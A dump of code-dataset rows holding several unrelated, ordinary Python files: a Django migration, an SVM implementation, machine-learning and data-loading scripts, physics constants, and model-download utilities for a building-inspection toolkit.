id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
166466 | <filename>generic_links/migrations/0001_initial.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '__first__'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='GenericLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_id', models.PositiveIntegerField(db_index=True)),
('url', models.URLField()),
('title', models.CharField(max_length=200)),
('description', models.TextField(max_length=1000, null=True, blank=True)),
('created_at', models.DateTimeField(auto_now_add=True, db_index=True)),
('is_external', models.BooleanField(default=True, db_index=True)),
('content_type', models.ForeignKey(to='contenttypes.ContentType', on_delete=models.CASCADE)),
('user', models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.SET_NULL)),
],
options={
'ordering': ('-created_at',),
'verbose_name': 'Generic Link',
'verbose_name_plural': 'Generic Links',
},
),
]
| StarcoderdataPython |
3397939 | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import Normalizer
from sklearn.model_selection import cross_val_score
from imblearn.under_sampling import RandomUnderSampler
import matplotlib.pyplot as plt
"""
The code in this class was adapted from the paper "Yet More Simple SMO algorithm" by Tymchyshyn and Khavliuk
Title: simplest_smo_ever/simple_svm.ipynb
Author: Tymchyshyn and Khavliuk
Date: 25/02/21
Code Version:1
Availability: https://github.com/fbeilstein/simplest_smo_ever/blob/master/simple_svm.ipynb
"""
class SVM:
def __init__(self, kernel='linear', C=10, max_iter=100, degree=3, gamma=1):
"""
:param kernel: Type of kernel used to manipulate decision boundary
:param C: Inverse strength of L2 regularization
:param max_iter: Number of iterations to change and update decision function
:param degree: degree of the power (used in polynomial function)
:param gamma: the influence of training examples by distance (low values far away, high values close by)
"""
self.kernel = {'poly': lambda x, y: np.dot(x, y.T) ** degree,
'rbf': lambda x, y: np.exp(-gamma * np.sum((y - x[:, np.newaxis]) ** 2, axis=-1)),
'linear': lambda x, y: np.dot(x, y.T)}[kernel]
self.C = C
self.max_iter = max_iter
def restrict_to_square(self, t, v0, u):
"""
restricts value to a square around the objective function so that it does not violate: 0<ai<C
:param t:
:param v0: value for the constraint. Transpose of the idxM and idxL
:param u:
:return:
"""
t = (np.clip(v0 + t * u, 0, self.C) - v0)[1] / u[1]
return (np.clip(v0 + t * u, 0, self.C) - v0)[0] / u[0]
def fit(self, X, y):
"""
:param X: Input variables
:param y: output variable classification
"""
self.X = X.copy()
#converts values of y to -1,1 as is the convention in SVM
self.y = y * 2 - 1
#initializes lagrangian multipliers to 0
self.lambdas = np.zeros_like(self.y, dtype=float)
#objective function
self.K = self.kernel(self.X, self.X) * self.y[:, np.newaxis] * self.y
#for loop iterating for iterations in constructor
for _ in range(self.max_iter):
#for loop for every lagrangrian multiplier
for idxM in range(len(self.lambdas)):
# sets second multiplier, a random choice of all lagrangian multipliers
idxL = np.random.randint(0, len(self.lambdas))
# matrix of all possible 2 value combination of the two lagrangian multipliers
Q = self.K[[[idxM, idxM], [idxL, idxL]], [[idxM, idxL], [idxM, idxL]]]
# value for the constraint. Transpose of the idxM and idxL
v0 = self.lambdas[[idxM, idxL]]
# # scalar function for a sample, minimizing the objective function with idxM, idxL
k0 = 1 - np.sum(self.lambdas * self.K[[idxM, idxL]], axis=1)
# scalar function for a sample, minimizing the objective function with idxM, idxL
u = np.array([-self.y[idxL], self.y[idxM]])
# maintaining lambda values as positive
t_max = np.dot(k0, u) / (np.dot(np.dot(Q, u), u) + 1E-15)
# lambda values after restriction
self.lambdas[[idxM, idxL]] = v0 + u * self.restrict_to_square(t_max, v0, u)
# indexes of support vectors
idx, = np.nonzero(self.lambdas > 1E-15)
#bias (mean error, taken from classifications
self.b = np.mean((1.0 - np.sum(self.K[idx] * self.lambdas, axis=1)) * self.y[idx])
def decision_function(self, X):
"""
:param X: X input values
:return: decision function, boundary for classification
"""
return np.sum(self.kernel(X, self.X) * self.y * self.lambdas, axis=1) + self.b
def predict(self, X):
return (np.sign(self.decision_function(X)) + 1) // 2
def accuracy(y_true, y_pred):
return np.sum((y_true == y_pred) / len(y_true))
def main():
# data preprocessing including standardization, data split, balancing classes
data = pd.read_csv("final_data.csv", index_col=[0])
data = data.to_numpy()# save memory
data = np.float16(data)
X = data[:, :-1]
Y = data[:, -1:]
rus = RandomUnderSampler()
X, y = rus.fit_resample(X, Y)
X_train, X_test, y_train, y_test = train_test_split(StandardScaler().fit_transform(X), y, test_size=0.2)
# creating model, fit and predicting values, printing accuracy
clf = SVM(C=10,kernel= 'rbf', max_iter = 100, gamma= 0.01)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
y_pred_true = [0 if y == -1 else y for y in y_pred]
print(accuracy(y_test,y_pred_true))
if __name__=='__main__':
main()
| StarcoderdataPython |
4916746 | <reponame>khan9797/parser
from scapy.all import Packet, raw
from scapy.layers.inet import IP, Ether, TCP, UDP
from scapy.layers.l2 import Dot1Q
from scapy.layers.sctp import SCTP
payload = '0' * 640
ether_hdr = Ether(src='00:34:56:78:9a:bc',dst='00:45:67:89:ab:cd')
ip_hdr = IP(version=0x04,ihl=0x5,tos=0x0,id=0x0001,flags=0x0000,ttl=0x64,src='10.60.0.1',dst='10.60.1.1')
tcp_hdr = TCP(sport=4250, dport=4300)
udp_hdr = UDP(sport=4250, dport=4300)
sctp_hdr = SCTP(sport=4250, dport=4300)
vlan_header = Dot1Q(vlan=5) | StarcoderdataPython |
6600552 | # Python script for rewriting a docker env file.
# usage: patch_env dockerenv_input.env dockerenv_output.env
# Copies each input line to the output, except when it is of the form
# VAR_X=value
# and an environment variable PATCH_VAR_X exists: then its value is used.
# Performs no error handling.
import os
import re
import sys
PATCHVAR_PREFIX = "PATCH_"
def patch_file(infile: str, outfile: str) -> None:
with open(infile, 'rt', encoding='utf-8') as input, \
open(outfile, 'wb') as output:
for line in input:
output.write(patched(line).encode('utf-8'))
def patched(line: str) -> str:
var_match = re.match(r"^(\w+)\s*=", line)
if var_match:
varname = var_match.group(1)
patchvarname = PATCHVAR_PREFIX + varname
patchvalue = os.environ.get(patchvarname, None)
if patchvalue is None:
return line # unpatched assignment line
else:
return "%s=%s\n" % (varname, patchvalue) # patched assignment line
else:
return line # non-assignment line
if __name__ == '__main__':
first = 2 if sys.argv[1].endswith('.py') else 1 # call: python patch_env.py in out
patch_file(sys.argv[first], sys.argv[first + 1])
| StarcoderdataPython |
11307338 | import os
import unittest
from kontur import FocusClient
class TestKonturFocus(unittest.TestCase):
def setUp(self):
api_key = os.getenv('FOCUS_API_KEY', None)
if api_key is None:
raise Exception('Set FOCUS_API_KEY env varible')
self.client = FocusClient(api_key)
def test_req(self):
inn = '6663003127'
org_list = self.client.req(inn=inn)
self.assertIsInstance(org_list, list, org_list)
self.assertEqual(1, len(org_list), org_list)
org = org_list[0]
self.assertIsInstance(org, dict, org)
self.assertIn('inn', org, org)
self.assertEqual(inn, org['inn'], org)
self.assertIn('ogrn', org, org)
ogrn = org['ogrn']
self.assertIn('UL', org, org)
ul = org['UL']
self.assertIn('legalName', ul, ul)
self.assertIn('short', ul['legalName'], ul)
self.assertGreater(len(ul['heads']), 0, ul)
| StarcoderdataPython |
40253 | """
Tool for 'leave-one-out' testing features in dataset.
Adds use_column parameter for lightgbm CLI, which works
like an opposite one to ignore_columns.
Example usage
--------------
>>> python lgbm_tool.py --use_column=column1,column2,column3 \
>>> config=path_to_config data=path_to_data valid=path_to_valid
"""
import argparse
import subprocess
from typing import List, TextIO
def _get_all_features(data_file: TextIO) -> List[str]:
features = data_file.readline().strip().split(',')
return features
def _generate_ignore_string(features: List[str],
features_left: List[str]) -> str:
for feature in features_left:
features.remove(feature)
ignore_string = 'name:' + ','.join([f"{feature}" for feature in features])
return ignore_string
def _parse_lgbm_config(config_file: str) -> dict:
config = {}
f = open(config_file, 'r')
for line in f:
line = line.strip()
if line.startswith('#'):
continue
parameter_name, parameter_value = line.split('=')
config[parameter_name] = parameter_value
f.close()
return config
def _get_label_column(lightgbm_cli_args: dict):
"""Checks whether label column is either in CLI arguments or lgbm config
file and gets it. If not, raises an exception.
"""
if 'label_column' in lightgbm_cli_args:
label_column = lightgbm_cli_args['label_column'].replace('name:', '')
return label_column
config = lightgbm_cli_args.get('config')
if not config:
raise ValueError('No label column provided')
lightgbm_config_args = _parse_lgbm_config(config)
if 'label_column' not in lightgbm_config_args:
raise ValueError('No label column provided')
label_column = lightgbm_config_args['label_column'].replace('name:', '')
return label_column
def run_lgbm(args: dict) -> None:
"""Asynchronously runs lightgbm"""
lightgbm_args = {
key: value for key, value in
map(lambda x: x.split('='), args['lightgbm_args'])
}
label_column = _get_label_column(lightgbm_args)
with open(lightgbm_args['data'], 'r') as f:
features = _get_all_features(f)
use_columns = args['use_column'].split(',')
use_columns.append(label_column)
ignore_string = _generate_ignore_string(features, use_columns)
subprocess.call(
[
'lightgbm',
f'ignore_column={ignore_string}',
*args['lightgbm_args']
],
)
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--use_column', type=str, required=False,
help='Features to use for training'
)
parser.add_argument(
'lightgbm_args', nargs='+',
help='Any arguments for lightgbm cli'
)
args = parser.parse_args()
run_lgbm(vars(args))
if __name__ == '__main__':
main()
| StarcoderdataPython |
322709 | #
# calculation of synthetic accessibility score as described in:
#
# Estimation of Synthetic Accessibility Score of Drug-like Molecules based on Molecular Complexity and Fragment Contributions
# <NAME> and <NAME>
# Journal of Cheminformatics 1:8 (2009)
# http://www.jcheminf.com/content/1/1/8
#
# several small modifications to the original paper are included
# particularly slightly different formula for marocyclic penalty
# and taking into account also molecule symmetry (fingerprint density)
#
# for a set of 10k diverse molecules the agreement between the original method
# as implemented in PipelinePilot and this implementation is r2 = 0.97
#
# <NAME> & <NAME>, september 2013
#
from __future__ import print_function
from rdkit import Chem
from rdkit.Chem import rdMolDescriptors
# from rdkit.six.moves import cPickle
import pickle
from rdkit.six import iteritems
import math
from collections import defaultdict
import os.path as op
_fscores = None
def readFragmentScores(name='fpscores'):
import gzip
global _fscores
# generate the full path filename:
if name == "fpscores":
name = op.join(op.dirname(__file__), name)
_fscores = pickle.load(gzip.open('%s.pkl.gz' % name))
outDict = {}
for i in _fscores:
for j in range(1, len(i)):
outDict[i[j]] = float(i[0])
_fscores = outDict
def numBridgeheadsAndSpiro(mol, ri=None):
nSpiro = rdMolDescriptors.CalcNumSpiroAtoms(mol)
nBridgehead = rdMolDescriptors.CalcNumBridgeheadAtoms(mol)
return nBridgehead, nSpiro
def calculateScore(m):
if _fscores is None:
readFragmentScores()
# fragment score
fp = rdMolDescriptors.GetMorganFingerprint(m,
2) #<- 2 is the *radius* of the circular fingerprint
fps = fp.GetNonzeroElements()
score1 = 0.
nf = 0
for bitId, v in iteritems(fps):
nf += v
sfp = bitId
score1 += _fscores.get(sfp, -4) * v
score1 /= nf
# features score
nAtoms = m.GetNumAtoms()
nChiralCenters = len(Chem.FindMolChiralCenters(m, includeUnassigned=True))
ri = m.GetRingInfo()
nBridgeheads, nSpiro = numBridgeheadsAndSpiro(m, ri)
nMacrocycles = 0
for x in ri.AtomRings():
if len(x) > 8:
nMacrocycles += 1
sizePenalty = nAtoms**1.005 - nAtoms
stereoPenalty = math.log10(nChiralCenters + 1)
spiroPenalty = math.log10(nSpiro + 1)
bridgePenalty = math.log10(nBridgeheads + 1)
macrocyclePenalty = 0.
# ---------------------------------------
# This differs from the paper, which defines:
# macrocyclePenalty = math.log10(nMacrocycles+1)
# This form generates better results when 2 or more macrocycles are present
if nMacrocycles > 0:
macrocyclePenalty = math.log10(2)
score2 = 0. - sizePenalty - stereoPenalty - spiroPenalty - bridgePenalty - macrocyclePenalty
# correction for the fingerprint density
# not in the original publication, added in version 1.1
# to make highly symmetrical molecules easier to synthetise
score3 = 0.
if nAtoms > len(fps):
score3 = math.log(float(nAtoms) / len(fps)) * .5
sascore = score1 + score2 + score3
# need to transform "raw" value into scale between 1 and 10
min = -4.0
max = 2.5
sascore = 11. - (sascore - min + 1) / (max - min) * 9.
# smooth the 10-end
if sascore > 8.:
sascore = 8. + math.log(sascore + 1. - 9.)
if sascore > 10.:
sascore = 10.0
elif sascore < 1.:
sascore = 1.0
return sascore
def processMols(mols):
print('smiles\tName\tsa_score')
for i, m in enumerate(mols):
if m is None:
continue
s = calculateScore(m)
smiles = Chem.MolToSmiles(m)
print(smiles + "\t" + m.GetProp('_Name') + "\t%3f" % s)
if __name__ == '__main__':
import sys, time
t1 = time.time()
readFragmentScores("fpscores")
t2 = time.time()
suppl = Chem.SmilesMolSupplier(sys.argv[1])
t3 = time.time()
processMols(suppl)
t4 = time.time()
print('Reading took %.2f seconds. Calculating took %.2f seconds' % ((t2 - t1), (t4 - t3)),
file=sys.stderr)
#
# Copyright (c) 2013, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
| StarcoderdataPython |
6419637 | <filename>notes/eos/units.py
##################################################
#Physical conversion factors
#Particle Data Group (Review of particle Physics 2015) values
# in SI units
#c = 2.99792458e8 #speed of light
#h = 6.62607004081e-34 #Planck constant
#G = 6.6730831e-11 #gravitational constant
eVSI = 1.602176620898e-19 #electron volt/Joule
pcSI = 3.08567758149e16 #parsec in m
RsSI = 2.9532500772e3 #Sch radius of Sun in m
Rs = 2.9532500772 #Sch radius of Sun in m
c = 2.99792458e10
G = 6.6730831e-8
me = 9.1093897e-28
mp = 1.6726231e-24
mn = 1.6749286e-24
kB = 1.380658e-16
hP = 6.6260755e-27
hbar = 1.05457266e-27
eC = 4.8032068e-10
mH = 1.6733e-24
eV = 1.602177e-12
pc = 3.08567758149e18
#plasma electron relativity temperature
Tr = me*c**2/kB
#neutron plasma relativity temperature
Tn = mn*c**2/kB
#electron Compton wavelength
lambdaC = hbar/me/c
#plasma reference pressure
Pr = me * c**2 / lambdaC**3
#neutron Compton wavelength
lambdaCn = hbar/mn/c
#Neutron reference pressure
Prn = mn * c**2 / lambdaCn**3
#Other conversion factors
kelvin_per_keV = 1.16045e7
erg_per_kev = 1.0e-10 / eVSI
GeVfm_per_dynecm = 1.e9 * eV / (1.0e-13)**3
##################################################
# Operate in units where G = c = 1.
# Use units of solar masses
##################################################
# (G Msun /c^2 )^-1
solar_mass_per_km = 2.0e3/Rs
# (G Msun/c^3)^-1
solar_mass_per_s = 2.0*c/Rs
##################################################
# other conversion factors
km_per_kpc = pcSI #km / kpc = m/pc
cm_per_tenkpc = 1.0e-6 / pcSI
# Blackbody constant
# hzkeV^4 * 2*h/c^2
#constbb = 1.0e15 * (eV/hP)**4 * 2.0*hP/c**2
# other constants
##################################################
#mass of sun
Msun = 1.988435e33
#kg_per_Msun = 1.988435e30
| StarcoderdataPython |
1882256 | <gh_stars>0
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from india_nhm.districts.base.data_cleaner import NHMDataLoaderBase
from india_nhm.districts.base.readme_generator import ReadMeGen
# Mapping dictionary for data columns and StatVars
cols_to_nodes = {
'District':
'District',
'DistrictCode':
'lgdCode',
'Date':
'Date',
'Total number of pregnant women Registered for ANC':
'Count_PregnantWomen_RegisteredForAntenatalCare',
'Number of Pregnant women registered within first trimester':
'Count_PregnantWomen_RegisteredForAntenatalCareWithinFirstTrimester',
'Total reported deliveries':
'Count_ChildDeliveryEvent',
'Institutional deliveries (Public Insts.+Pvt. Insts.)':
'Count_ChildDeliveryEvent_InAnInstitution',
'Deliveries Conducted at Public Institutions':
'Count_ChildDeliveryEvent_InPublicInstitution',
'Number of Home deliveries':
'Count_ChildDeliveryEvent_AtHome',
'Number of home deliveries attended by SBA trained (Doctor/Nurse/ANM)':
'Count_ChildDeliveryEvent_AtHome_WithStandByAssist',
'% Safe deliveries to Total Reported Deliveries':
'Count_DeliveryEvent_Safe_AsFractionOf_Count_DeliveryEvent'
}
clean_names = {
'District':
'District',
'DistrictCode':
'lgdCode',
'Date':
'Date',
'Total number of pregnant women Registered for ANC':
'Total number of pregnant women registered for Antenatal Care',
'Number of Pregnant women registered within first trimester':
'Number of pregnant women registered for Antenatal Care within first trimester',
'Total reported deliveries':
'Total reported child deliveries',
'Institutional deliveries (Public Insts.+Pvt. Insts.)':
'Institutional deliveries (includes public and private institutions)',
'Deliveries Conducted at Public Institutions':
'Deliveries conducted at public institutions',
'Number of Home deliveries':
'Number of home deliveries',
'Number of home deliveries attended by SBA trained (Doctor/Nurse/ANM)':
'Number of home deliveries attended by StandBy Assist (Doctor/Nurse/ANM)',
'% Safe deliveries to Total Reported Deliveries':
'Percentage of safe deliveries to total reported deliveries'
}
if __name__ == '__main__':
dataset_name = "NHM_MaternalHealth"
# Preprocess files; Generate CSV; Generate TMCF file
loader = NHMDataLoaderBase(data_folder='../data/',
dataset_name=dataset_name,
cols_dict=cols_to_nodes,
clean_names=clean_names,
final_csv_path="{}.csv".format(dataset_name))
loader.generate_csv()
loader.create_mcf_tmcf()
# Write README file
readme_gen = ReadMeGen(dataset_name=dataset_name,
dataset_description="Maternal Health Data",
data_level="District level",
cols_dict=cols_to_nodes,
clean_names=clean_names)
readme_gen.gen_readme()
| StarcoderdataPython |
9783152 | class Solution:
def lengthOfLongestSubstringV1(self, s: str) -> int:
char_map = [None] * 128
start, ans = -1, 0
for i, c in enumerate(s):
code = ord(c)
if char_map[code] != None:
start = max(start, char_map[code])
char_map[code] = i
ans = max(ans, i - start)
return ans
def lengthOfLongestSubstringV2(self, s: str) -> int:
char_map, start, ans = {}, -1, 0
for i, c in enumerate(s):
if c in char_map:
start = max(start, char_map[c])
char_map[c] = i
ans = max(ans, i - start)
return ans
# TEST
for s, expected in [
["", 0],
["abcabcbb", 3],
["bbbbb", 1],
["pwwkew", 3],
["c", 1],
["abba", 2],
]:
sol = Solution()
actual = sol.lengthOfLongestSubstringV2(s)
print("Length of longest substring of", s, "->", actual)
assert actual == expected
| StarcoderdataPython |
8095850 | <reponame>Ganyuhao/executor
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
单元测试基类
"""
import os
import tempfile
import unittest
from executor.common.config import Manage
import yaml
def get_config_item(item, default, type_c):
upper_item = str(item).upper().replace("-", "_")
env_var = os.getenv("FUCKER_EXECUTOR_%s" % upper_item)
if env_var:
var = env_var
else:
var = default
if not type_c:
return str(var)
elif type_c == bool:
return str(var).lower() == "true"
return type_c(var)
class TestCase(unittest.TestCase):
config_items = {
"host": get_config_item("host", "0.0.0.0", str),
"port": get_config_item("port", "50001", int),
"database_port": get_config_item("database_port", 3306, int),
"debug": get_config_item("debug", True, bool),
"log_file": get_config_item("log_file", tempfile.mktemp(), str),
"database_username": get_config_item("database_username", "root", str),
"database_host": get_config_item("database_host", "127.0.0.1", str),
"database_password": get_config_item("database_password", "<PASSWORD>", str),
}
data_file_path = None
_test_dataset = {}
@classmethod
def setUpClass(cls):
conf = Manage(**cls.config_items)
conf.update_config_items(**cls.config_items)
cls.conf = Manage()
if cls.data_file_path:
data_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"datas",
cls.data_file_path)
with open(data_file_path, "rb") as yaml_fp:
cls._test_dataset = yaml.safe_load(yaml_fp)
def get_test_date(self, *args):
td = self._test_dataset.get(args[0], {})
for path in args[1:]:
td = td.get(path, {})
return td
| StarcoderdataPython |
3282968 | <reponame>shawncal/ELL
###################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: classifier.py
# Authors: <NAME>
#
# Requires: Python 3.x
#
###################################################################################################
import os
import time
import numpy as np
class AudioClassifier:
"""
This class wraps an ELL audio classifier model and adds some nice features, like mapping the
predictions to a string label, any category starting with "_" will be classified as null. It also
does some optional posterior smoothing on the predictions since audio model outputs
tend to be rather noisy. It also supports a threshold value so any prediction less than this
probability is ignored.
"""
def __init__(self, model_path, categories_file, threshold=0, smoothing_window=0, ignore_list=[]):
"""
Initialize the new AudioClassifier.
model - the path to the ELL model module to load.
categories_file - the path to a text file containing strings labels for each prediction
threshold - threshold for predictions, (default 0).
smoothing_window - controls the size of the smoothing window (defaults to 0).
ignore_list - list of category labels to ignore (like 'background' or 'silence')
"""
self.smoothing_window = None
if smoothing_window is not None:
self.smoothing_window = float(smoothing_window)
self.threshold = threshold
self.categories = None
if isinstance(ignore_list, str):
self.ignore_list = [x.strip() for x in ignore_list.split(',')]
elif isinstance(ignore_list, list):
self.ignore_list = ignore_list
elif ignore_list is None:
self.ignore_list = []
else:
raise Exception("Expecting ignore list to be a comma separated list or a python list of strings")
if categories_file:
with open(categories_file, "r") as fp:
self.categories = [e.strip() for e in fp.readlines()]
self.using_map = False
if os.path.splitext(model_path)[1] == ".ell":
import compute_ell_model as ell
self.model = ell.ComputeModel(model_path)
self.using_map = True
else:
import compiled_ell_model as ell
self.model = ell.CompiledModel(model_path)
self.logfile = None
ts = self.model.input_shape
self.input_shape = (ts.rows, ts.columns, ts.channels)
ts = self.model.output_shape
self.output_shape = (ts.rows, ts.columns, ts.channels)
self.input_size = int(self.model.input_shape.Size())
self.output_size = int(self.model.output_shape.Size())
self.smoothing_items = []
self.total_time = 0
self.count = 0
def get_metadata(self, name):
return self.model.get_metadata(name)
def set_log(self, logfile):
""" provide optional log file to write the raw un-smoothed predictions to """
self.logfile = logfile
def predict(self, feature_data):
""" process the given feature_data using the classifier model, and smooth
the output. It returns a tuple containing (prediction, probability, label) """
start_time = time.time()
output = self.model.transform(feature_data)
now = time.time()
diff = now - start_time
self.total_time += diff
self.count += 1
if self.logfile:
self.logfile.write("{}\n".format(",".join([str(x) for x in output])))
if self.smoothing_window:
output = self._smooth(output)
prediction = self._get_prediction(output)
if prediction is not None:
label = ""
if self.categories and prediction < len(self.categories):
label = self.categories[prediction]
if label not in self.ignore_list:
return (prediction, output[prediction], label, output)
return (None, None, None, None)
def reset(self):
self.model.reset()
def clear_smoothing(self):
self.smoothing_window = []
def _get_prediction(self, output):
""" handles scalar and vector predictions """
if len(output) == 1:
prediction = output[0]
if np.isscalar(output):
return 1 if output > self.threshold else None
else:
prediction = np.argmax(output)
if prediction in self.ignore_list:
return None
if output[prediction] > self.threshold:
return prediction
return None
def _smooth(self, predictions):
""" smooth the predictions over a given window size """
self.smoothing_items += [predictions] # add our new item
# trim to our smoothing window size
if len(self.smoothing_items) > self.smoothing_window:
del self.smoothing_items[0]
# compute summed probabilities over this new sliding window
return np.mean(self.smoothing_items, axis=0)
def avg_time(self):
""" get the average prediction time """
if self.count == 0:
self.count = 1
return self.total_time / self.count
| StarcoderdataPython |
177906 | #!/usr/bin/python
import sys
from collections import defaultdict
from collections import OrderedDict
print 'Begin to combine files:', ((sys.argv[1]).split('/'))[-1], ((sys.argv[2]).split('/'))[-1]
bo_dict = defaultdict(list)
fi = open(sys.argv[1], 'r') #wyb.imp
for line in fi:
s = line.strip().split()
#s[0] = '1'
o = "1"
key = int(s[2])
bo_dict[key].append(o)
fi.close()
fi = open(sys.argv[2], 'r') #wyb.lose
for line in fi:
s = line.strip().split()
#s[0] = '0'
o = "0"
key = int(s[2])
bo_dict[key].append(o)
fi.close()
bo_dict_sort = OrderedDict(sorted(bo_dict.items()))
fo = open(sys.argv[3], 'w')
for key in bo_dict_sort:
line = ' '.join([str(key)] + bo_dict_sort[key])
fo.write(line + '\n')
fo.close()
print 'Finished creating file:', ((sys.argv[3]).split('/'))[-1]
print '-------------------'
| StarcoderdataPython |
312394 | <gh_stars>0
import shutil
import urllib.request
import os
import hashlib
import sys
import zipfile
import json
import pprint
from os.path import dirname
from PIL import Image
from urllib.request import urlretrieve
from patoolib import extract_archive
from time import sleep
import requests
import ssl
import cv2
import requests
from io import BytesIO
from .models import DaclNet
import torch
pp = pprint.PrettyPrinter(indent=4)
bikit_path = dirname(__file__)
with open(os.path.join(bikit_path, "data/datasets.json")) as f:
DATASETS = json.load(f)
DEMO_DATASETS = {"test_zip": {"description": "",
"download_name": "test_zip",
"license": "",
"urls": ["https://github.com/phiyodr/building-inspection-toolkit/raw/master/bikit/data/test_zip.zip"],
"original_names": ["test_zip.zip"],
"checksums": ["63b3722e69dcf7e14c879411c1907dae"],
"sizes": ["0.2 MB"]},
"test_rar": {"description": "",
"download_name": "test_rar",
"license": "",
"urls": ["https://github.com/phiyodr/building-inspection-toolkit/raw/master/bikit/data/test_rar.rar"],
"original_names": ["test_rar.rar"],
"checksums": ["c020266280b076ff123294ae51af2b11"],
"sizes": ["3.7 MB"]}}
def pil_loader(path):
"""Outputs an PIL Image object"""
# open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert('RGB')
def cv2_loader(path):
"""Outputs an numpy.ndarray object"""
# Can only use str not pathlib.PosixPath
return cv2.cvtColor(cv2.imread(str(path)), cv2.COLOR_BGR2RGB)
def load_img_from_url(img_url):
return Image.open(BytesIO(requests.get(img_url).content))
########## Model ##########
def list_models(verbose=True, cache_dir='~/.cache/bikit-models', force_redownload=False):
"""
List all datasets available
:param verbose: Print datasets
:return: Return dictionary containing datasets name, url and original name.
"""
models_metadata = get_metadata(cache_dir, force_redownload)
if verbose:
pp.pprint(models_metadata)
return models_metadata
def download_model(name, cache_dir='~/.cache/bikit-models', force_redownload=False):
models_metadata = get_metadata(cache_dir, force_redownload)
all_model_names = list(models_metadata.keys())
assert name in all_model_names, f"Please specify a valid model <name> out of {all_model_names}. You used {name}."
base_url = "https://github.com/phiyodr/bikit-models/raw/master/models/"
model_url = os.path.join(base_url, models_metadata[name]["pth_name"])
filename = os.path.join(os.path.expanduser(cache_dir), models_metadata[name]["pth_name"])
if not os.path.isfile(filename) or force_redownload:
print(f"Start to download {name}.")
urlretrieve(model_url, filename)
print(f"Successfully downloaded model to {filename}.")
else:
print(f"Model {filename} already exists.")
return filename
########## Metadata ##########
def download_metadata(cache_dir='~/.cache/bikit-models', force_redownload=False):
"""Download metadata.json from Repository."""
cache_dir = os.path.expanduser(cache_dir)
metadata_url = "https://github.com/phiyodr/bikit-models/raw/master/metadata.json"
filename = os.path.join(cache_dir, "metadata.json")
if not os.path.isfile(filename) or force_redownload:
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
urlretrieve(metadata_url, filename)
print(f"Successfully downloaded metadata.json to {filename}.")
else:
print(f"metadata.json already exists at {filename}.")
def read_metadata(cache_dir='~/.cache/bikit-models'):
"""Read metadata.json from directory."""
filename = os.path.join(os.path.expanduser(cache_dir), "metadata.json")
with open(filename) as json_file:
metadata = json.load(json_file)
return metadata
def get_metadata(cache_dir='~/.cache/bikit-models', force_redownload=False):
"Return metadata.json as dict."
filename = os.path.join(os.path.expanduser(cache_dir), "metadata.json")
if not os.path.isfile(filename) or force_redownload:
_ = download_metadata(cache_dir, force_redownload)
return read_metadata(cache_dir)
def load_model(name, add_metadata=True, cache_dir="~/.cache/bikit-models", force_redownload=False):
models_metadata = get_metadata(cache_dir, force_redownload)
all_model_names = list(models_metadata.keys())
assert name in all_model_names, f"Please specify a valid model <name> out of {all_model_names}. You used {name}."
model_path = os.path.join(os.path.expanduser(cache_dir), models_metadata[name]["pth_name"])
if not os.path.isfile(model_path) or force_redownload:
download_model(name, cache_dir='~/.cache/bikit-models')
cp = torch.load(model_path, map_location=torch.device('cpu'))
model = DaclNet(base_name=cp['base'],
resolution = cp['resolution'],
hidden_layers=cp['hidden_layers'],
drop_prob=cp['drop_prob'],
num_class=cp['num_class'])
model.load_state_dict(cp['state_dict'])
model.eval()
if add_metadata:
metadata = get_metadata(cache_dir, force_redownload)[name]
return model, metadata
else:
return model
########## Datasets ##########
def list_datasets(verbose=True):
"""
List all datasets available
:param verbose: Print datasets
:return: Return dictionary containing datasets name, url and original name.
"""
datasets = DATASETS
if verbose:
pp.pprint(datasets)
return datasets
